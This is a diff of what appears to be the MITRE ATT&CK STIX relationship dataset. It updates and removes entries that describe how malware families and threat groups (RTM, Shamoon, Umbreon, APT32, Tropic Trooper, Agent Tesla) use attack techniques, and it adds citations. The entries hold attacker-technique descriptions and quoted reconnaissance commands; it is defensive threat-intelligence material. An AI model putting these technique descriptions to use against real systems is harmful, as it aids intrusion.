@@ -48745,7 +49794,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--045d0922-2310-4e60-b5e4-3302302cb3c5",
"type": "relationship",
- "modified": "2020-03-17T02:15:40.297Z",
+ "modified": "2020-06-22T17:54:15.490Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -48905,27 +49954,6 @@
"modified": "2019-03-25T17:15:03.466Z",
"created": "2017-05-31T21:33:27.079Z"
},
- {
- "id": "relationship--9b906d63-83bd-46de-909e-80a8712b94de",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[Umbreon](https://attack.mitre.org/software/S0221) provides additional access using its backdoor Espeon, providing a reverse shell upon receipt of a special packet(Citation: Umbreon Trend Micro)",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "external_references": [
- {
- "source_name": "Umbreon Trend Micro",
- "description": "Fernando Merc\u00eas. (2016, September 5). Pok\u00e9mon-themed Umbreon Linux Rootkit Hits x86, ARM Systems. Retrieved March 5, 2018.",
- "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/pokemon-themed-umbreon-linux-rootkit-hits-x86-arm-systems/?_ga=2.180041126.367598458.1505420282-1759340220.1502477046"
- }
- ],
- "source_ref": "malware--3d8e547d-9456-4f32-a895-dc86134e282f",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--c2dc4e98-ce10-4af8-866f-2187e84466f4",
- "type": "relationship",
- "modified": "2020-03-27T22:14:19.045Z",
- "created": "2018-04-18T17:59:24.739Z"
- },
{
"id": "relationship--d200ba08-8179-495e-a854-9b13be5c0f93",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -48950,22 +49978,27 @@
{
"id": "relationship--d5c86dd3-3cfa-4ade-8984-fdf079b9f81b",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[RTM](https://attack.mitre.org/software/S0148) strings, network data, configuration, and modules are encrypted with a modified RC4 algorithm.(Citation: ESET RTM Feb 2017)",
+ "description": "[RTM](https://attack.mitre.org/software/S0148) strings, network data, configuration, and modules are encrypted with a modified RC4 algorithm. [RTM](https://attack.mitre.org/software/S0148) has also been delivered to targets as various archive files including ZIP, 7-ZIP, and RAR.(Citation: ESET RTM Feb 2017)(Citation: Unit42 Redaman January 2019)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
- "source_name": "ESET RTM Feb 2017",
- "description": "Faou, M. and Boutin, J.. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
- "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf"
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf",
+ "description": "Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
+ "source_name": "ESET RTM Feb 2017"
+ },
+ {
+ "source_name": "Unit42 Redaman January 2019",
+ "url": "https://unit42.paloaltonetworks.com/russian-language-malspam-pushing-redaman-banking-malware/",
+ "description": "Duncan, B., Harbison, M. (2019, January 23). Russian Language Malspam Pushing Redaman Banking Malware. Retrieved June 16, 2020."
}
],
"source_ref": "malware--92ec0cbd-2c30-44a2-b270-73f4ec949841",
"relationship_type": "uses",
"target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
"type": "relationship",
- "modified": "2020-03-16T17:46:56.876Z",
+ "modified": "2020-06-16T20:51:13.581Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -49105,16 +50138,15 @@
],
"external_references": [
{
- "description": "ClearSky. (2016, January 7). Operation DustySky. Retrieved January 8, 2016.",
"source_name": "DustySky",
- "url": "https://www.clearskysec.com/wp-content/uploads/2016/01/Operation%20DustySky_TLP_WHITE.pdf"
+ "description": "ClearSky. (2016, January 7). Operation DustySky. Retrieved January 8, 2016."
}
],
"source_ref": "malware--687c23e4-4e25-4ee7-a870-c5e002511f54",
"relationship_type": "uses",
"target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
"type": "relationship",
- "modified": "2020-03-23T22:01:46.014Z",
+ "modified": "2020-05-14T15:14:33.555Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -49257,12 +50289,12 @@
"url": "https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html"
}
],
- "source_ref": "malware--3cab1b76-2f40-4cd0-8d2c-7ed16eeb909c",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-01-16T16:13:52.465Z"
+ "created": "2018-01-16T16:13:52.465Z",
+ "source_ref": "malware--3cab1b76-2f40-4cd0-8d2c-7ed16eeb909c",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e"
},
{
"id": "relationship--82e1ab81-89f9-4d96-87fd-69d04c6710f3",
@@ -49341,12 +50373,12 @@
"url": "https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html"
}
],
- "source_ref": "malware--0ced8926-914e-4c78-bc93-356fb90dbd1f",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "malware--0ced8926-914e-4c78-bc93-356fb90dbd1f",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736"
},
{
"id": "relationship--a12a471b-39b2-4abf-80d0-af88d5a4f038",
@@ -49800,7 +50832,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
"type": "relationship",
- "modified": "2020-03-18T19:25:30.166Z",
+ "modified": "2020-05-20T13:38:06.884Z",
"created": "2019-01-29T18:44:05.087Z"
},
{
@@ -49866,27 +50898,6 @@
"modified": "2019-07-26T16:10:42.525Z",
"created": "2019-01-29T19:55:48.168Z"
},
- {
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "external_references": [
- {
- "description": "Horejsi, J., et al. (2018, March 14). Tropic Trooper\u2019s New Strategy. Retrieved November 9, 2018.",
- "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/",
- "source_name": "TrendMicro Tropic Trooper Mar 2018"
- }
- ],
- "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) can use ports 443 and 53 for C2 communications via malware called TClient.(Citation: TrendMicro Tropic Trooper Mar 2018)",
- "id": "relationship--f3a6218e-35e3-4897-9b3b-0554a51dce43",
- "source_ref": "intrusion-set--56319646-eb6e-41fc-ae53-aadfa7adb924",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e",
- "type": "relationship",
- "modified": "2019-06-30T22:44:28.109Z",
- "created": "2019-01-29T20:17:49.272Z"
- },
{
"id": "relationship--bd7dce44-be74-4d8e-b9e4-efcd77b8a29b",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -49969,12 +50980,12 @@
"url": "https://www.welivesecurity.com/2013/03/19/gapz-and-redyms-droppers-based-on-power-loader-code/"
}
],
- "source_ref": "malware--0a9c51e0-825d-4b9b-969d-ce86ed8ce3c3",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--0042a9f5-f053-4769-b3ef-9ad018dfa298",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-01-16T16:13:52.465Z"
+ "created": "2018-01-16T16:13:52.465Z",
+ "source_ref": "malware--0a9c51e0-825d-4b9b-969d-ce86ed8ce3c3",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--0042a9f5-f053-4769-b3ef-9ad018dfa298"
},
{
"id": "relationship--1be07482-c5ed-42f9-8be1-5dbb44152461",
@@ -50027,16 +51038,16 @@
],
"external_references": [
{
- "source_name": "ESET RTM Feb 2017",
- "description": "Faou, M. and Boutin, J.. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
- "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf"
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf",
+ "description": "Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
+ "source_name": "ESET RTM Feb 2017"
}
],
"source_ref": "malware--92ec0cbd-2c30-44a2-b270-73f4ec949841",
"relationship_type": "uses",
"target_ref": "attack-pattern--799ace7f-e227-4411-baa0-8868704f2a69",
"type": "relationship",
- "modified": "2020-03-16T17:46:56.944Z",
+ "modified": "2020-05-12T22:13:16.878Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -50170,22 +51181,27 @@
{
"id": "relationship--272068a3-47e3-42d6-8772-71d39c1976c3",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[Shamoon](https://attack.mitre.org/software/S0140) obtains the victim's operating system version and keyboard layout and sends the information to the C2 server.(Citation: Palo Alto Shamoon Nov 2016)",
+ "description": "[Shamoon](https://attack.mitre.org/software/S0140) obtains the victim's operating system version and keyboard layout and sends the information to the C2 server.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Unit 42 Shamoon3 2018)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
- "source_name": "Palo Alto Shamoon Nov 2016",
+ "url": "http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/",
"description": "Falcone, R.. (2016, November 30). Shamoon 2: Return of the Disttrack Wiper. Retrieved January 11, 2017.",
- "url": "http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/"
+ "source_name": "Palo Alto Shamoon Nov 2016"
+ },
+ {
+ "description": "Falcone, R. (2018, December 13). Shamoon 3 Targets Oil and Gas Organization. Retrieved March 14, 2019.",
+ "url": "https://unit42.paloaltonetworks.com/shamoon-3-targets-oil-gas-organization/",
+ "source_name": "Unit 42 Shamoon3 2018"
}
],
"source_ref": "malware--8901ac23-6b50-410c-b0dd-d8174a86f9b3",
"relationship_type": "uses",
"target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
"type": "relationship",
- "modified": "2019-04-24T23:59:16.187Z",
+ "modified": "2020-05-29T18:11:23.525Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -50602,27 +51618,6 @@
"modified": "2019-05-30T18:05:32.748Z",
"created": "2019-01-30T14:00:49.906Z"
},
- {
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "external_references": [
- {
- "description": "Cherepanov, A., Lipovsky, R. (2018, October 11). New TeleBots backdoor: First evidence linking Industroyer to NotPetya. Retrieved November 27, 2018.",
- "url": "https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/",
- "source_name": "ESET TeleBots Oct 2018"
- }
- ],
- "description": "[Exaramel for Windows](https://attack.mitre.org/software/S0343) can execute GO scripts.(Citation: ESET TeleBots Oct 2018)",
- "id": "relationship--29bc6cf7-25aa-41da-8be3-e2de12c7d876",
- "source_ref": "malware--051eaca1-958f-4091-9e5f-a9acd8f820b5",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830",
- "type": "relationship",
- "modified": "2020-03-20T17:11:15.231Z",
- "created": "2019-01-30T15:10:04.213Z"
- },
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
@@ -50832,27 +51827,6 @@
"modified": "2019-07-26T18:47:18.860Z",
"created": "2019-01-31T00:36:40.962Z"
},
- {
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "external_references": [
- {
- "url": "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf",
- "description": "Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.",
- "source_name": "Cybereason Cobalt Kitty 2017"
- }
- ],
- "description": "[APT32](https://attack.mitre.org/groups/G0050) enumerated administrative users and DC servers using the commands net localgroup administrators and net group \"Domain Controllers\" /domain.(Citation: Cybereason Cobalt Kitty 2017)",
- "id": "relationship--eabc867b-7383-4752-b3ec-ad51ec8104bb",
- "source_ref": "intrusion-set--247cb30b-955f-42eb-97a5-a89fef69341e",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--21875073-b0ee-49e3-9077-1e2a885359af",
- "type": "relationship",
- "modified": "2020-03-18T19:33:54.728Z",
- "created": "2019-01-31T01:07:58.606Z"
- },
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
@@ -51275,22 +52249,27 @@
{
"id": "relationship--4e9c5234-65e9-4b4a-bc13-891e7aed84b2",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[Shamoon](https://attack.mitre.org/software/S0140) creates a new service named \u201cntssrv\u201d to execute the payload.(Citation: Palo Alto Shamoon Nov 2016)",
+ "description": "[Shamoon](https://attack.mitre.org/software/S0140) creates a new service named \u201cntssrv\u201d to execute the payload. Newer versions create the \"MaintenaceSrv\" and \"hdv_725x\" services.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Unit 42 Shamoon3 2018)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
- "source_name": "Palo Alto Shamoon Nov 2016",
+ "url": "http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/",
"description": "Falcone, R.. (2016, November 30). Shamoon 2: Return of the Disttrack Wiper. Retrieved January 11, 2017.",
- "url": "http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/"
+ "source_name": "Palo Alto Shamoon Nov 2016"
+ },
+ {
+ "description": "Falcone, R. (2018, December 13). Shamoon 3 Targets Oil and Gas Organization. Retrieved March 14, 2019.",
+ "url": "https://unit42.paloaltonetworks.com/shamoon-3-targets-oil-gas-organization/",
+ "source_name": "Unit 42 Shamoon3 2018"
}
],
"source_ref": "malware--8901ac23-6b50-410c-b0dd-d8174a86f9b3",
"relationship_type": "uses",
"target_ref": "attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32",
"type": "relationship",
- "modified": "2019-04-24T23:59:16.229Z",
+ "modified": "2020-05-29T18:11:23.520Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -51352,12 +52331,12 @@
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
- "source_ref": "tool--294e2560-bd48-44b2-9da2-833b5588ad11",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "tool--294e2560-bd48-44b2-9da2-833b5588ad11",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0"
},
{
"id": "relationship--e58abef6-2089-4f55-b5ee-9fc24378b52f",
@@ -51566,22 +52545,27 @@
{
"id": "relationship--1e03e95c-1c9a-4fa8-9d6d-b5d244b06509",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[RTM](https://attack.mitre.org/software/S0148) collects data from the clipboard.(Citation: ESET RTM Feb 2017)",
+ "description": "[RTM](https://attack.mitre.org/software/S0148) collects data from the clipboard.(Citation: ESET RTM Feb 2017)(Citation: Unit42 Redaman January 2019)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
- "source_name": "ESET RTM Feb 2017",
- "description": "Faou, M. and Boutin, J.. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
- "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf"
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf",
+ "description": "Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
+ "source_name": "ESET RTM Feb 2017"
+ },
+ {
+ "source_name": "Unit42 Redaman January 2019",
+ "url": "https://unit42.paloaltonetworks.com/russian-language-malspam-pushing-redaman-banking-malware/",
+ "description": "Duncan, B., Harbison, M. (2019, January 23). Russian Language Malspam Pushing Redaman Banking Malware. Retrieved June 16, 2020."
}
],
"source_ref": "malware--92ec0cbd-2c30-44a2-b270-73f4ec949841",
"relationship_type": "uses",
"target_ref": "attack-pattern--30973a08-aed9-4edf-8604-9084ce1b5c4f",
"type": "relationship",
- "modified": "2020-03-16T17:46:56.928Z",
+ "modified": "2020-06-16T20:51:13.652Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -51823,12 +52807,12 @@
"url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf"
}
],
- "source_ref": "tool--a52edc76-328d-4596-85e7-d56ef5a9eb69",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--e624264c-033a-424d-9fd7-fc9c3bbdb03e",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "tool--a52edc76-328d-4596-85e7-d56ef5a9eb69",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--e624264c-033a-424d-9fd7-fc9c3bbdb03e"
},
{
"id": "relationship--4f2fb45a-8359-4c75-93ae-095fcf9f856e",
@@ -51909,35 +52893,40 @@
{
"source_name": "Kaspersky Regin",
"description": "Kaspersky Lab's Global Research and Analysis Team. (2014, November 24). THE REGIN PLATFORM NATION-STATE OWNAGE OF GSM NETWORKS. Retrieved December 1, 2014.",
- "url": "https://securelist.com/files/2014/11/Kaspersky_Lab_whitepaper_Regin_platform_eng.pdf"
+ "url": "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08070305/Kaspersky_Lab_whitepaper_Regin_platform_eng.pdf"
}
],
"source_ref": "malware--4c59cce8-cb48-4141-b9f1-f646edfaadb0",
"relationship_type": "uses",
"target_ref": "attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4",
"type": "relationship",
- "modified": "2020-03-16T17:37:15.671Z",
+ "modified": "2020-06-29T01:54:53.318Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
"id": "relationship--45f9e4b6-a6a0-4f9f-aae9-9e8a69f5681d",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[RTM](https://attack.mitre.org/software/S0148) can obtain a list of smart card readers attached to the victim.(Citation: ESET RTM Feb 2017)",
+ "description": "[RTM](https://attack.mitre.org/software/S0148) can obtain a list of smart card readers attached to the victim.(Citation: ESET RTM Feb 2017)(Citation: Unit42 Redaman January 2019)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
- "source_name": "ESET RTM Feb 2017",
- "description": "Faou, M. and Boutin, J.. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
- "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf"
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf",
+ "description": "Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
+ "source_name": "ESET RTM Feb 2017"
+ },
+ {
+ "source_name": "Unit42 Redaman January 2019",
+ "url": "https://unit42.paloaltonetworks.com/russian-language-malspam-pushing-redaman-banking-malware/",
+ "description": "Duncan, B., Harbison, M. (2019, January 23). Russian Language Malspam Pushing Redaman Banking Malware. Retrieved June 16, 2020."
}
],
"source_ref": "malware--92ec0cbd-2c30-44a2-b270-73f4ec949841",
"relationship_type": "uses",
"target_ref": "attack-pattern--348f1eef-964b-4eb6-bb53-69b3dcb0c643",
"type": "relationship",
- "modified": "2020-03-16T17:46:56.988Z",
+ "modified": "2020-06-16T20:51:13.669Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -51975,12 +52964,12 @@
"url": "http://researchcenter.paloaltonetworks.com/2016/01/scarlet-mimic-years-long-espionage-targets-minority-activists/"
}
],
- "source_ref": "malware--463f68f1-5cde-4dc2-a831-68b73488f8f4",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--c848fcf7-6b62-4bde-8216-b6c157d48da0",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "malware--463f68f1-5cde-4dc2-a831-68b73488f8f4",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--c848fcf7-6b62-4bde-8216-b6c157d48da0"
},
{
"id": "relationship--f02f0a58-a76b-4966-8717-8a9b40b07e81",
@@ -52289,12 +53278,12 @@
"url": "http://researchcenter.paloaltonetworks.com/2016/01/scarlet-mimic-years-long-espionage-targets-minority-activists/"
}
],
- "source_ref": "malware--463f68f1-5cde-4dc2-a831-68b73488f8f4",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "malware--463f68f1-5cde-4dc2-a831-68b73488f8f4",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5"
},
{
"id": "relationship--a0c8ed8f-8c17-4ab1-b403-f1cfd314d3da",
@@ -52371,28 +53360,33 @@
],
"external_references": [
{
- "source_name": "Talos Agent Tesla Oct 2018",
+ "description": "Brumaghin, E., et al. (2018, October 15). Old dog, new tricks - Analysing new RTF-based campaign distributing Agent Tesla, Loki with PyREbox. Retrieved November 5, 2018.",
"url": "https://blog.talosintelligence.com/2018/10/old-dog-new-tricks-analysing-new-rtf_15.html",
- "description": "Brumaghin, E., et al. (2018, October 15). Old dog, new tricks - Analysing new RTF-based campaign distributing Agent Tesla, Loki with PyREbox. Retrieved November 5, 2018."
+ "source_name": "Talos Agent Tesla Oct 2018"
},
{
- "source_name": "Fortinet Agent Tesla April 2018",
+ "description": "Zhang, X. (2018, April 05). Analysis of New Agent Tesla Spyware Variant. Retrieved November 5, 2018.",
"url": "https://www.fortinet.com/blog/threat-research/analysis-of-new-agent-tesla-spyware-variant.html",
- "description": "Zhang, X. (2018, April 05). Analysis of New Agent Tesla Spyware Variant. Retrieved November 5, 2018."
+ "source_name": "Fortinet Agent Tesla April 2018"
},
{
"source_name": "Fortinet Agent Tesla June 2017",
"url": "https://www.fortinet.com/blog/threat-research/in-depth-analysis-of-net-malware-javaupdtr.html",
"description": "Zhang, X. (2017, June 28). In-Depth Analysis of A New Variant of .NET Malware AgentTesla. Retrieved November 5, 2018."
+ },
+ {
+ "source_name": "Bitdefender Agent Tesla April 2020",
+ "url": "https://labs.bitdefender.com/2020/04/oil-gas-spearphishing-campaigns-drop-agent-tesla-spyware-in-advance-of-historic-opec-deal/",
+ "description": "Arsene, L. (2020, April 21). Oil & Gas Spearphishing Campaigns Drop Agent Tesla Spyware in Advance of Historic OPEC+ Deal. Retrieved May 19, 2020."
}
],
- "description": "[Agent Tesla](https://attack.mitre.org/software/S0331) can steal data from the victim\u2019s clipboard.(Citation: Talos Agent Tesla Oct 2018)(Citation: Fortinet Agent Tesla April 2018)(Citation: Fortinet Agent Tesla June 2017)",
+ "description": "[Agent Tesla](https://attack.mitre.org/software/S0331) can steal data from the victim\u2019s clipboard.(Citation: Talos Agent Tesla Oct 2018)(Citation: Fortinet Agent Tesla April 2018)(Citation: Fortinet Agent Tesla June 2017)(Citation: Bitdefender Agent Tesla April 2020)",
"id": "relationship--06dded4b-f28c-45d3-8dc6-097a9a4a3cd6",
"source_ref": "malware--e7a5229f-05eb-440e-b982-9a6d2b2b87c8",
"relationship_type": "uses",
"target_ref": "attack-pattern--30973a08-aed9-4edf-8604-9084ce1b5c4f",
"type": "relationship",
- "modified": "2019-04-16T14:30:35.274Z",
+ "modified": "2020-05-20T13:38:06.936Z",
"created": "2019-01-29T18:44:05.069Z"
},
{
@@ -52494,15 +53488,20 @@
"description": "Ray, V. (2016, November 22). Tropic Trooper Targets Taiwanese Government and Fossil Fuel Provider With Poison Ivy. Retrieved November 9, 2018.",
"url": "https://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/",
"source_name": "Unit 42 Tropic Trooper Nov 2016"
+ },
+ {
+ "source_name": "TrendMicro Tropic Trooper May 2020",
+ "url": "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf",
+ "description": "Chen, J.. (2020, May 12). Tropic Trooper\u2019s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020."
}
],
- "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) used shellcode with an XOR algorithm to decrypt a payload.(Citation: Unit 42 Tropic Trooper Nov 2016)",
+ "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) used shellcode with an XOR algorithm to decrypt a payload. [Tropic Trooper](https://attack.mitre.org/groups/G0081) also decrypted image files which contained a payload.(Citation: Unit 42 Tropic Trooper Nov 2016)(Citation: TrendMicro Tropic Trooper May 2020)",
"id": "relationship--d68120b8-9ef8-4a40-ae4c-d2b597336140",
"source_ref": "intrusion-set--56319646-eb6e-41fc-ae53-aadfa7adb924",
"relationship_type": "uses",
"target_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c",
"type": "relationship",
- "modified": "2019-06-30T22:44:28.129Z",
+ "modified": "2020-05-21T12:59:00.542Z",
"created": "2019-01-29T20:17:49.301Z"
},
{
@@ -53062,13 +54061,13 @@
"source_name": "Cybereason Cobalt Kitty 2017"
}
],
- "description": "[APT32](https://attack.mitre.org/groups/G0050) used NTFS alternate data stream to hide their payloads.(Citation: Cybereason Cobalt Kitty 2017)",
+ "description": "[APT32](https://attack.mitre.org/groups/G0050) used NTFS alternate data streams to hide their payloads.(Citation: Cybereason Cobalt Kitty 2017)",
"id": "relationship--1eeb08cb-8b06-45a7-bf74-fb8bdaa4b02f",
"source_ref": "intrusion-set--247cb30b-955f-42eb-97a5-a89fef69341e",
"relationship_type": "uses",
"target_ref": "attack-pattern--f2857333-11d4-45bf-b064-2c28d8525be5",
"type": "relationship",
- "modified": "2019-07-17T13:11:37.867Z",
+ "modified": "2020-06-24T03:16:06.453Z",
"created": "2019-01-31T01:07:58.592Z"
},
{
@@ -53200,12 +54199,12 @@
"url": "https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf"
}
],
- "source_ref": "malware--49abab73-3c5c-476e-afd5-69b5c732d845",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-04-18T17:59:24.739Z"
+ "created": "2018-04-18T17:59:24.739Z",
+ "source_ref": "malware--49abab73-3c5c-476e-afd5-69b5c732d845",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830"
},
{
"id": "relationship--ed2c177c-18fc-4bfd-9169-48af1557a542",
@@ -53288,7 +54287,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e",
"type": "relationship",
- "modified": "2018-10-17T00:14:20.652Z",
+ "modified": "2020-06-23T20:40:40.939Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -53326,12 +54325,12 @@
"url": "https://www.intezer.com/miragefox-apt15-resurfaces-with-new-tools-based-on-old-ones/"
}
],
- "source_ref": "malware--e3cedcfe-6515-4348-af65-7f2c4157bf0d",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-10-17T00:14:20.652Z"
+ "created": "2018-10-17T00:14:20.652Z",
+ "source_ref": "malware--e3cedcfe-6515-4348-af65-7f2c4157bf0d",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e"
},
{
"id": "relationship--3cd0e385-3c60-4742-b3a6-c07dbf10ba45",
